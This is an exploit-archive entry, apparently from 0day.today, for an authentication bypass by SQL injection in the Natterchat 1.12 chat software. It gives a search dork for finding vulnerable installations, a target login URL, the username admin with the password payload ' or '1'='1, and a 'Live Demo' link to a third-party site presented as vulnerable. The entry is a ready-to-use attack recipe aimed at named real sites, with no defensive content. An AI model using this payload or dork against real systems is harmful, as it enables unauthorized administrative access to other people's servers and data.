id: 4217
date: 11/20/2008
title: Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability
author: Stack
cves: 

================================================================
Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability
================================================================


[+] Script Name    : Natterchat v1.12 (Auth Bypass) Remote SQL Injection Vulnerability
[+] Author         : Mountassif Moad
[+] Dork           : Powered by Natterchat v1.12

[+] Expl0iT :
1) Go to the Login page http://www.site.il/chat/nattechat/home.asp
2) Username : admin 
   Password : ' or '1'='1

Live Demo
http://www.sprq.ca/cgi-bin/natterchat/chat.asp




#  0day.today [2023-03-23]  #